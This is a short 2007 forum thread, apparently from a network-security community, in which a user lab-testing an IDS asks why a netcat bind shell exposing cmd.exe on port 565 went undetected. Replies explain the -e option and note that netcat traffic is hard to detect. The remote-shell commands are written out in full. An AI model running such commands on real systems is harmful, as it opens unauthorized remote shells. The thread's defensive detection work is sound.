IPS will not detect a successful netcat attack

Unanswered Question
Sep 13th, 2007

I am doing the following lab testing:

nc ?v ?l ?e cmd.exe ?p 565


nc ?v .x.x.x.x 565

I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?

Any help is highly appreciated.

I have this problem too.
0 votes
  • 1
  • 2
  • 3
  • 4
  • 5
Overall Rating: 0 (0 ratings)
jopontes Thu, 09/13/2007 - 12:23


nc -v -l -e cmd.exe -p 565


nc -v .x.x.x.x 565

mhellman Fri, 09/14/2007 - 09:29

You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.

To trigger your signature, setup the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.

jopontes Fri, 09/14/2007 - 09:59

Got it! But, as a matter of fact my doubt was:

Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?

mhellman Fri, 09/14/2007 - 10:05

Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFC's. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.

jopontes Fri, 09/14/2007 - 10:31

Thanks Matt! I'll try to update the sensor and play with that then.


This Discussion